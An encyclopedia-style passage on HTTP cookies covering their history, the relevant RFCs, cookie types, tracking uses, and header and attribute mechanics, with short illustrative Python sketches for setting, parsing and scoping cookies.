HTTP cookies (also called web cookies, Internet cookies, browser cookies, or simply cookies) are small blocks of data created by a web server while a user is browsing a website and placed on the user's computer or other device by the user's web browser. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.
Cookies serve useful and sometimes essential functions on the web. They enable web servers to store stateful information (such as items added in the shopping cart in an online store) on the user's device or to track the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to save, for subsequent use, information that the user previously entered into form fields, such as names, addresses, passwords, and payment card numbers.
Authentication cookies are commonly used by web servers to authenticate that a user is logged in, and with which account they are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted.
Security vulnerabilities may allow a cookie's data to be read by an attacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples).
Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories, a potential privacy concern that prompted European and U.S. lawmakers to take action in 2011.
European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device.
Background
Origin of the name
The term ''cookie'' was coined by web-browser programmer Lou Montulli. It was derived from the term ''magic cookie'', which is a packet of data a program receives and sends back unchanged, used by Unix programmers.
The term magic cookie itself derives from the fortune cookie, which is a cookie with an embedded message.
History
Magic cookies were already used in computing when computer programmer Lou Montulli had the idea of using them in web communications in June 1994. At the time, he was an employee of Netscape Communications, which was developing an e-commerce application for MCI. Vint Cerf and John Klensin represented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a virtual shopping cart.
[Kesan, Jey; and Shah, Rajiv; ''Deconstructing Code'', SSRN.com, chapter II.B (Netscape's cookies), Yale Journal of Law and Technology, 6, 277–389] [Kristol, David; ''HTTP Cookies: Standards, privacy, and politics'', ACM Transactions on Internet Technology, 1(2), 151–198, 2001 (an expanded version is freely available at arXiv:cs/0105018v1 [cs.SE])]
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Mosaic Netscape, released on October 13, 1994, supported cookies.
The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, which was granted in 1998. Support for cookies was integrated with
Internet Explorer
in version 2, released in October 1995.
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence. The public learned about cookies after the ''
Financial Times
'' published an article about them on February 12, 1996.
In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S.
Federal Trade Commission hearings in 1996 and 1997.
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk
mailing list. A special working group within the
Internet Engineering Task Force
(IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by
Brian Behlendorf
and David Kristol respectively. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specified that third-party cookies either were not allowed at all, or at least were not enabled by default.
At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
RFC 2965 added a
Set-Cookie2
header field, which informally came to be called "RFC 2965-style cookies" as opposed to the original
Set-Cookie
header field which was called "Netscape-style cookies".
[The edbrowse documentation version 3.5 said "Note that only Netscape-style cookies are supported. However, this is the most common flavor of cookie. It will probably meet your needs." This paragraph was removed in later versions of the documentation further to RFC 2965's deprecation.]
Set-Cookie2 was seldom used, however, and was deprecated in RFC 6265 in April 2011, which was written as a definitive specification for cookies as used in the real world.
No modern browser recognizes the
Set-Cookie2
header field.
Terminology
Session cookie
A ''session cookie'' (also known as an ''in-memory cookie'', ''transient cookie'' or ''non-persistent cookie'') exists only in temporary memory while the user navigates a website.
[Microsoft Support, ''Description of Persistent and Per-Session Cookies in Internet Explorer'', Article ID 223799, 2007]
Session cookies expire or are deleted when the user closes the web browser.
Session cookies are identified by the browser by the absence of an expiration date assigned to them.
Persistent cookie
A ''persistent cookie'' expires at a specific date or after a specific length of time. For the persistent cookie's lifespan set by its creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).
For this reason, persistent cookies are sometimes referred to as ''tracking cookies'' because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. Persistent cookies are also used for reasons such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit.
Secure cookie
A ''secure cookie'' can only be transmitted over an encrypted connection (i.e. HTTPS). It cannot be transmitted over unencrypted connections (i.e. HTTP). This makes the cookie less likely to be exposed to cookie theft via eavesdropping. A cookie is made secure by adding the Secure flag to the cookie.
Http-only cookie
An ''http-only cookie'' cannot be accessed by client-side APIs, such as JavaScript. This restriction mitigates the threat of cookie theft via cross-site scripting (XSS). However, the cookie remains vulnerable to cross-site tracing (XST) and cross-site request forgery (CSRF) attacks. A cookie is given this characteristic by adding the HttpOnly flag to the cookie.
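As a minimal sketch of how a server might attach both flags, the following uses `SimpleCookie` from Python's standard `http.cookies` module. The helper name `build_session_cookie`, the cookie name and value, and the `Path=/` attribute are illustrative assumptions, not part of any specification quoted here.

```python
from http.cookies import SimpleCookie


def build_session_cookie(name: str, value: str) -> str:
    """Return a Set-Cookie header value carrying the Secure and HttpOnly flags."""
    cookie = SimpleCookie()
    cookie[name] = value
    # Flag attributes: a true value makes them appear in the serialized header.
    cookie[name]["secure"] = True
    cookie[name]["httponly"] = True
    cookie[name]["path"] = "/"  # assumed scope, chosen only for illustration
    return cookie[name].OutputString()


header_value = build_session_cookie("sessionToken", "abc123")
print("Set-Cookie:", header_value)
```

A browser that honours these flags would send the cookie only over HTTPS and would keep it out of reach of `document.cookie`.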
Same-site cookie
In 2016, Google Chrome version 51 introduced a new kind of cookie with the attribute SameSite. The attribute SameSite can have a value of Strict, Lax or None.
With the attribute SameSite=Strict, browsers would only send cookies to a target domain that is the same as the origin domain. This would effectively mitigate cross-site request forgery (CSRF) attacks.
With SameSite=Lax, browsers would send cookies with requests to a target domain even if it is different from the origin domain, but only for ''safe'' requests such as GET (POST is unsafe), and not as third-party cookies (inside an iframe). The attribute SameSite=None would allow third-party (cross-site) cookies; however, most browsers require the Secure attribute on SameSite=None cookies.
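The three values can be summarised as a small decision function. This is a deliberately simplified model rather than any browser's actual algorithm: the function name and parameters are hypothetical, the caller is assumed to already know whether a request is cross-site and whether it is a top-level navigation, and the set of safe methods is taken from general HTTP semantics.

```python
# HTTP methods conventionally treated as "safe" (read-only).
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


def should_send_cookie(same_site: str, is_cross_site: bool, method: str,
                       is_top_level_navigation: bool,
                       is_secure_cookie: bool = True) -> bool:
    """Decide whether a cookie accompanies a request (simplified model)."""
    if not is_cross_site:
        # Same-site requests always carry the cookie.
        return True
    policy = same_site.lower()
    if policy == "strict":
        return False
    if policy == "lax":
        # Only safe, top-level navigations; not iframes or cross-site POSTs.
        return is_top_level_navigation and method.upper() in SAFE_METHODS
    if policy == "none":
        # Modelled on browsers that insist on Secure for SameSite=None.
        return is_secure_cookie
    raise ValueError(f"unknown SameSite value: {same_site!r}")
```

For example, `should_send_cookie("Lax", True, "POST", True)` evaluates to `False`, which is how Lax blunts a forged cross-site form submission.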
The same-site cookie is incorporated into a new RFC draft for "Cookies: HTTP State Management Mechanism" to update RFC 6265 (if approved).
Chrome, Firefox, and Microsoft Edge have all started to support same-site cookies.
The key to the rollout is the treatment of existing cookies without the SameSite attribute defined. Chrome had been treating those existing cookies as if SameSite=None, which would keep all websites and applications running as before. Google intended to change that default to SameSite=Lax in February 2020; the change would break those applications and websites that rely on third-party/cross-site cookies but do not define the SameSite attribute. Given the extensive changes for web developers and COVID-19 circumstances, Google temporarily rolled back the SameSite cookie change.
Supercookie
A ''supercookie'' is a cookie with an origin of a top-level domain (such as .com) or a public suffix (such as .co.uk). Ordinary cookies, by contrast, have an origin of a specific domain name, such as example.com.
Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of .com could maliciously affect a request made to example.com, even if the cookie did not originate from example.com. This can be used to fake logins or change user information.
The Public Suffix List helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.
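The kind of check a browser might perform can be sketched as follows. The set `EXAMPLE_PUBLIC_SUFFIXES` is a tiny hand-written stand-in for the real Public Suffix List, and both function names are hypothetical; real browsers apply more detailed domain-matching rules than this.

```python
# Hand-written stand-in for the Public Suffix List (assumption, far from complete).
EXAMPLE_PUBLIC_SUFFIXES = {"com", "org", "uk", "co.uk"}


def normalize_domain(domain: str) -> str:
    """Lower-case a domain and drop any leading dot."""
    return domain.strip().lstrip(".").lower()


def accept_cookie_domain(domain_attribute: str, request_host: str) -> bool:
    """Reject supercookies and cookies scoped to an unrelated domain."""
    domain = normalize_domain(domain_attribute)
    if domain in EXAMPLE_PUBLIC_SUFFIXES:
        # A cookie scoped to a whole suffix would be a supercookie.
        return False
    host = normalize_domain(request_host)
    # The host must be the cookie domain itself or one of its subdomains.
    return host == domain or host.endswith("." + domain)
```

With this sketch, a cookie declaring `Domain=.com` is refused even when it is set by `example.com`, while `Domain=example.com` set by `www.example.com` is accepted.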
Other uses
The term ''supercookie'' is sometimes used for tracking technologies that do not rely on HTTP cookies. Two such ''supercookie'' mechanisms were found on Microsoft websites in August 2011: cookie syncing that respawned MUID (machine unique identifier) cookies, and
ETag cookies.
Due to media attention, Microsoft later disabled this code.
In a 2021 blog post, Mozilla used the term ''supercookie'' to refer to
the use of browser cache as a means of tracking users across sites.
Zombie cookie
A ''zombie cookie'' is data and code that has been placed by a web server on a visitor's computer or other device in a hidden location outside the visitor's web browser's dedicated cookie storage location, and that automatically recreates an HTTP cookie as a regular cookie after the original cookie has been deleted. The zombie cookie may be stored in multiple locations, such as Flash Local shared object, HTML5 Web storage, and other client-side and even server-side locations. When absence is detected in one of the locations, the missing instance is recreated by the JavaScript code using the data stored in other locations.
Cookie wall
A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.
Structure
A cookie consists of the following components:
[Jim Manico quoting Daniel Stenberg, ''Real world cookie length limits'']
# Name
# Value
# Zero or more attributes (name/value pairs). Attributes store information such as the cookie's expiration, domain, and flags (such as Secure and HttpOnly).
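The three components can be made concrete by splitting a `Set-Cookie` header value by hand. The function `parse_set_cookie` below is a hypothetical helper written for illustration; it is a sketch that ignores quoting and other edge cases a real parser would handle.

```python
from typing import Dict, Tuple, Union


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, Union[str, bool]]]:
    """Split a Set-Cookie value into (name, value, attributes)."""
    parts = [part.strip() for part in header_value.split(";")]
    # The first segment is always the name=value pair.
    name, _, value = parts[0].partition("=")
    attributes: Dict[str, Union[str, bool]] = {}
    for part in parts[1:]:
        if not part:
            continue
        attr_name, _, attr_value = part.partition("=")
        # Flags such as Secure have no value; record them as True.
        attributes[attr_name.strip().lower()] = attr_value.strip() or True
    return name.strip(), value.strip(), attributes


name, value, attributes = parse_set_cookie(
    "sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT; Secure; HttpOnly"
)
print(name, value, attributes)
```

Attribute names are lower-cased in the result because they are matched case-insensitively in practice.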
Uses
Session management
Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtual ''shopping cart'' or ''shopping basket'').
Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains a
unique session identifier (typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.
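A minimal sketch of this arrangement, assuming an in-memory dictionary in place of the server's database: the class `SessionStore` and its methods are hypothetical names, and `secrets.token_urlsafe` is used here as one reasonable way to produce an unguessable identifier.

```python
import secrets
from typing import Dict, List


class SessionStore:
    """Keeps shopping carts on the server, keyed by session identifier."""

    def __init__(self) -> None:
        self._carts: Dict[str, List[str]] = {}

    def create_session(self) -> str:
        # Random identifier that would be sent to the client in a cookie.
        session_id = secrets.token_urlsafe(32)
        self._carts[session_id] = []
        return session_id

    def add_item(self, session_id: str, item: str) -> None:
        self._carts[session_id].append(item)

    def cart_for(self, session_id: str) -> List[str]:
        # Unknown identifiers simply map to an empty cart.
        return list(self._carts.get(session_id, []))


store = SessionStore()
session_id = store.create_session()  # value for e.g. "Set-Cookie: sid=<session_id>"
store.add_item(session_id, "book")
print(store.cart_for(session_id))
```

Only the identifier travels in the cookie; the cart contents never leave the server.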
Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that that particular session identifier has been authenticated and grants the user access to its services.
Because session cookies only contain a unique session identifier, this makes the amount of personal information that a website can save about each user virtually limitless—the website is not limited to restrictions concerning how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.
Personalization
Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.
Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the
Google
search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see.
Also,
DuckDuckGo
uses cookies to allow users to set the viewing preferences like colors of the web page.
Tracking
Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the
IP address
of the computer requesting the page or the
referer
field of the
HTTP
request header, but cookies allow for greater precision. This can be demonstrated as follows:
# If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. So the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page.
# From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server not only sends the page as usual but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.
By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
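The two steps and the log analysis can be sketched in a few lines. `TrackingServer` is a hypothetical class, the log is an in-memory list rather than a file, and timestamps are passed in explicitly so the example stays deterministic; unlike the description above, this sketch also logs the very first request.

```python
import secrets
from typing import List, Optional, Tuple


class TrackingServer:
    """Assigns an identifier on first contact and logs every page request."""

    def __init__(self) -> None:
        self.log: List[Tuple[str, str, float]] = []  # (visitor_id, url, timestamp)

    def handle_request(self, url: str, cookie_id: Optional[str],
                       timestamp: float) -> str:
        # Step 1: no cookie means a first visit, so mint a new identifier.
        visitor_id = cookie_id or secrets.token_hex(16)
        # Step 2: record which visitor asked for which page, and when.
        self.log.append((visitor_id, url, timestamp))
        return visitor_id  # sent back to the browser as the cookie value

    def pages_visited(self, visitor_id: str) -> List[str]:
        entries = sorted((e for e in self.log if e[0] == visitor_id),
                         key=lambda e: e[2])
        return [url for _, url, _ in entries]


server = TrackingServer()
visitor = server.handle_request("/index.html", None, timestamp=0.0)
server.handle_request("/spec.html", visitor, timestamp=12.5)
print(server.pages_visited(visitor))
```

The gap between consecutive timestamps for one identifier gives an estimate of how long the visitor stayed on each page.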
Corporations exploit users' web habits by tracking cookies to collect information about buying habits. The ''
Wall Street Journal
'' found that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files.
[Rainie, Lee (2012). Networked: The New Social Operating System. p. 237] The data can then be collected and sold to bidding corporations.
Implementation
Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing
states (memory of previous events) into otherwise stateless
HTTP
transactions. Without cookies, each retrieval of a
web page or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as
JavaScript
(unless the cookie's
HttpOnly
flag is set, in which case the cookie cannot be modified by scripting languages).
The cookie specifications [IETF, ''HTTP State Management Mechanism'', RFC 6265 (tools.ietf.org/html/rfc6265), April 2011; obsoletes RFC 2965] require that browsers meet the following requirements in order to support cookies:
* Can support cookies as large as 4,096 bytes in size.
* Can support at least 50 cookies per domain (i.e. per website).
* Can support at least 3,000 cookies in total.
Setting a cookie
Cookies are set using the
Set-Cookie
header field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).
As an example, the browser sends its first HTTP request for the homepage of the
www.example.org
website:
GET /index.html HTTP/1.1
Host: www.example.org
...
The server responds with two
Set-Cookie
header fields:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
...
The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first, ''theme'', is considered to be a ''session cookie'' since it does not have an
Expires
or
Max-Age
attribute. Session cookies are intended to be deleted by the browser when the browser closes. The second, ''sessionToken'', is considered to be a ''persistent cookie'' since it contains an
Expires
attribute, which instructs the browser to delete the cookie at a specific date and time.
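The distinction can be checked mechanically. The sketch below parses each header value from the example with `SimpleCookie` from Python's standard `http.cookies` module and applies the rule stated above; `classify_cookie` is a hypothetical helper name.

```python
from http.cookies import SimpleCookie


def classify_cookie(set_cookie_value: str) -> str:
    """Return 'persistent' if Expires or Max-Age is present, else 'session'."""
    jar = SimpleCookie()
    jar.load(set_cookie_value)
    morsel = next(iter(jar.values()))  # the single cookie in this header value
    # Unset attributes are stored as empty strings on the morsel.
    if morsel["expires"] or morsel["max-age"]:
        return "persistent"
    return "session"


print(classify_cookie("theme=light"))
print(classify_cookie("sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT"))
```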
Next, the browser sends another request to visit the
spec.html
page on the website. This request contains a
Cookie
header field, which contains the two cookies that the server instructed the browser to set:
GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
…
This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including more
Set-Cookie
header fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include a
Set-Cookie
header field with an expiration date in the past.
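The exchange above can be sketched with Python's standard http.cookies module. This is only an illustration of the header fields involved, not a browser implementation; the variable names are hypothetical, and the "browser" step is reduced to echoing back name and value pairs.

```python
from http.cookies import SimpleCookie

# Server side: build the two Set-Cookie header fields from the example.
response_cookies = SimpleCookie()
response_cookies["theme"] = "light"  # no Expires or Max-Age: a session cookie
response_cookies["sessionToken"] = "abc123"
response_cookies["sessionToken"]["expires"] = "Wed, 09 Jun 2021 10:18:14 GMT"

# One header value per cookie, as sent in separate Set-Cookie fields.
set_cookie_values = [m.OutputString() for m in response_cookies.values()]

# Browser side, heavily simplified: only name=value pairs are echoed back,
# joined into a single Cookie header field.
cookie_header = "; ".join(f"{m.key}={m.value}" for m in response_cookies.values())

# Server side, next request: parse the Cookie header field.
request_cookies = SimpleCookie()
request_cookies.load(cookie_header)
session_token = request_cookies["sessionToken"].value

# Removing a cookie: send it again with an expiration date in the past.
removal = SimpleCookie()
removal["theme"] = "deleted"
removal["theme"]["expires"] = "Thu, 01 Jan 1970 00:00:00 GMT"
removal_value = removal["theme"].OutputString()
```

Note that the attributes (here, the expiry date) appear only in the response; the request carries just the name and value of each cookie.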
The value of a cookie may consist of any printable ASCII character (! through ~, Unicode \u0021 through \u007E) excluding , and ; and whitespace characters. The name of a cookie excludes the same characters, as well as =, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but not implemented by browsers.
The term ''cookie crumb'' is sometimes used to refer to a cookie's name–value pair.
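A minimal sketch of the character rule described above, assuming the excluded punctuation characters are the comma and the semicolon. The function names are hypothetical, and real browsers and servers may be stricter or more lenient than this check.

```python
# Printable ASCII from "!" (0x21) through "~" (0x7E); whitespace lies outside this range.
PRINTABLE = {chr(code) for code in range(0x21, 0x7F)}
VALUE_FORBIDDEN = {",", ";"}            # assumption: comma and semicolon are excluded
NAME_FORBIDDEN = VALUE_FORBIDDEN | {"="}  # "=" separates the name from the value


def is_valid_cookie_value(value: str) -> bool:
    """Return True if every character is allowed in a cookie value."""
    return all(ch in PRINTABLE and ch not in VALUE_FORBIDDEN for ch in value)


def is_valid_cookie_name(name: str) -> bool:
    """Return True if the name is non-empty and every character is allowed."""
    return bool(name) and all(
        ch in PRINTABLE and ch not in NAME_FORBIDDEN for ch in name
    )
```

Under these assumptions a value such as a=b is accepted, while the same string is rejected as a name.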
Cookies can also be set by scripting languages such as
JavaScript
that run within the browser. In JavaScript, the object
document.cookie
is used for this purpose. For example, the instruction
document.cookie = "temperature=20"
creates a cookie of name ''temperature'' and value ''20''.
Cookie attributes
In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server; they send only the cookie's name and value. Browsers use cookie attributes to decide when to delete a cookie, whether to block it, and whether to send it to the server.
Domain and Path
The
Domain
and
Path
attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the website
example.org
cannot set a cookie that has a domain of
foo.com
because this would allow the website
example.org
to control the cookies of the domain
foo.com
.
If a cookie's
Domain
and
Path
attributes are not specified by the server, they default to the domain and path of the resource that was requested.
However, in most browsers there is a difference between a cookie set from
foo.com
without a domain, and a cookie set with the
foo.com
domain. In the former case, the cookie will only be sent for requests to
foo.com
, also known as a host-only cookie. In the latter case, all subdomains are also included (for example,
docs.foo.com
).
Notable exceptions to this general rule are Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always send cookies to subdomains regardless of whether the cookie was set with or without a domain.
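The difference between a host-only cookie and a cookie with an explicit domain can be sketched as a small matching function. This is a simplified illustration of the behaviour most browsers follow, with a hypothetical function name; it ignores details such as public-suffix checks and IP-address hosts.

```python
def domain_matches(request_host: str, cookie_domain: str, host_only: bool) -> bool:
    """Decide whether a cookie's domain scope covers the requested host."""
    request_host = request_host.lower()
    cookie_domain = cookie_domain.lower().lstrip(".")  # a leading dot is ignored
    if host_only:
        # Set without a Domain attribute: exact host match only.
        return request_host == cookie_domain
    # Set with a Domain attribute: the domain itself and all of its subdomains.
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)
```

For example, a cookie set from foo.com without a domain would not be sent to docs.foo.com, while the same cookie set with the foo.com domain would be. The dot in the suffix check prevents an unrelated host such as evilfoo.com from matching.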
Below is an example of some
Set-Cookie
header fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within the
docs.foo.com
subdomain:
HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
…
The first cookie,
LSID
, has no
Domain
attribute, and has a
Path
attribute set to
/accounts
. This tells the browser to use the cookie only when requesting pages contained in
docs.foo.com/accounts
(the domain is derived from the request domain). The other two cookies,
HSID
and
SSID
, would be used when the browser requests any subdomain in
.foo.com
on any path (for example
www.foo.com/bar
). The leading dot is optional in recent standards, but can be added for compatibility with RFC 2109-based implementations.
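The scoping of the three cookies in this example can be sketched as follows. The class and function names are hypothetical, the path rule is a simplified form of prefix matching on path segments, and the Secure and HttpOnly attributes are deliberately ignored here.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class StoredCookie:
    name: str
    domain: str      # host the cookie is scoped to, without a leading dot
    host_only: bool  # True when the server sent no Domain attribute
    path: str


def domain_matches(host: str, cookie: StoredCookie) -> bool:
    if cookie.host_only:
        return host == cookie.domain
    return host == cookie.domain or host.endswith("." + cookie.domain)


def path_matches(request_path: str, cookie_path: str) -> bool:
    if request_path == cookie_path:
        return True
    if not request_path.startswith(cookie_path):
        return False
    # The prefix must end at a "/" boundary, so /accounts does not cover /accountsx.
    return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"


def cookies_for(host: str, request_path: str, jar: list) -> list:
    """Names of the cookies a browser would attach to a request."""
    return [
        c.name
        for c in jar
        if domain_matches(host, c) and path_matches(request_path, c.path)
    ]


# The three cookies from the example, as stored after a response from docs.foo.com.
JAR = [
    StoredCookie("LSID", "docs.foo.com", True, "/accounts"),
    StoredCookie("HSID", "foo.com", False, "/"),
    StoredCookie("SSID", "foo.com", False, "/"),
]
```

With this jar, a request for www.foo.com/bar would carry only HSID and SSID, while a request for a page under docs.foo.com/accounts would carry all three.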
Expires and Max-Age
The
Expires
attribute defines a specific date and time for when the browser should delete the cookie. The date and time are specified in the form
Wdy, DD Mon YYYY HH:MM:SS GMT
, or in the form
Wdy, DD Mon YY HH:MM:SS GMT
for values of YY where YY is greater than or equal to 0 and less than or equal to 69.
Alternatively, the
Max-Age
attribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of three
Set-Cookie
header fields that were received from a website after a user logged in:
HTTP/1.0 200 OK
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly
The first cookie,
lu
, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie,
made_write_conn
, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie,
reg_fb_gate
, has its value changed to ''deleted'', with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that the cookie will only be deleted if the domain and path attributes in the
Set-Cookie
field match the values used when the cookie was created.
Internet Explorer did not support
Max-Age
.
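A rough sketch of how an expiry time could be derived from these two attributes. The function names are hypothetical. Two details are taken from RFC 6265 rather than from the text above and should be read as assumptions of this sketch: Max-Age takes precedence when both attributes are present, and two-digit years from 70 to 99 map to 1970 to 1999.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from typing import Optional


def expand_two_digit_year(yy: int) -> int:
    """Map a two-digit year to four digits: 0-69 -> 20YY, 70-99 -> 19YY."""
    if not 0 <= yy <= 99:
        raise ValueError("expected a two-digit year")
    return 2000 + yy if yy <= 69 else 1900 + yy


def effective_expiry(
    received_at: datetime,
    expires: Optional[str] = None,
    max_age: Optional[int] = None,
) -> Optional[datetime]:
    """Return the expiry time, or None for a session cookie."""
    if max_age is not None:
        # Max-Age is relative to the moment the browser received the cookie.
        return received_at + timedelta(seconds=max_age)
    if expires is not None:
        # Four-digit-year dates such as "Tue, 15 Jan 2013 21:47:38 GMT".
        return parsedate_to_datetime(expires)
    return None


def is_expired(expiry: Optional[datetime], now: datetime) -> bool:
    """Session cookies (expiry None) never expire by date."""
    return expiry is not None and expiry <= now
```

A cookie whose Expires date lies in 1970, like reg_fb_gate above, is already expired at any realistic receive time, which is why the browser deletes it immediately.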
Secure and HttpOnly
The
Secure
and
HttpOnly
attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.
The
Secure
attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via
secure/encrypted connections. However, if a web server sets a cookie with a secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user by
man-in-the-middle attack
s. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.
The
HttpOnly
attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notably
JavaScript
), and therefore cannot be stolen easily via
cross-site scripting
(a pervasive attack technique).
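As an illustration, both flags can be emitted with Python's standard http.cookies module, and the browser-side decisions they control can be written as two small predicates. The predicate names are hypothetical and describe the intended behaviour only, not any particular browser's code.

```python
from http.cookies import SimpleCookie

# Server side: the flags carry no value; their presence enables the behaviour.
cookie = SimpleCookie()
cookie["sessionToken"] = "abc123"
cookie["sessionToken"]["secure"] = True
cookie["sessionToken"]["httponly"] = True
header_value = cookie["sessionToken"].OutputString()


def may_send(scheme: str, secure: bool) -> bool:
    """A Secure cookie is only attached to requests over an encrypted connection."""
    return scheme == "https" or not secure


def visible_to_script(httponly: bool) -> bool:
    """An HttpOnly cookie is hidden from client-side scripts such as document.cookie."""
    return not httponly
```

The two flags are independent: Secure restricts the transport, while HttpOnly restricts which parts of the browser may read the cookie.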
Browser settings
Most modern browsers support cookies and allow the user to disable them. The following are common options:
* To enable or disable cookies completely, so that they are always accepted or always blocked.
* To view and selectively delete cookies using a cookie manager.
* To fully wipe all private data, including cookies.
Add-on tools for managing cookie permissions also exist.
Third-party cookie
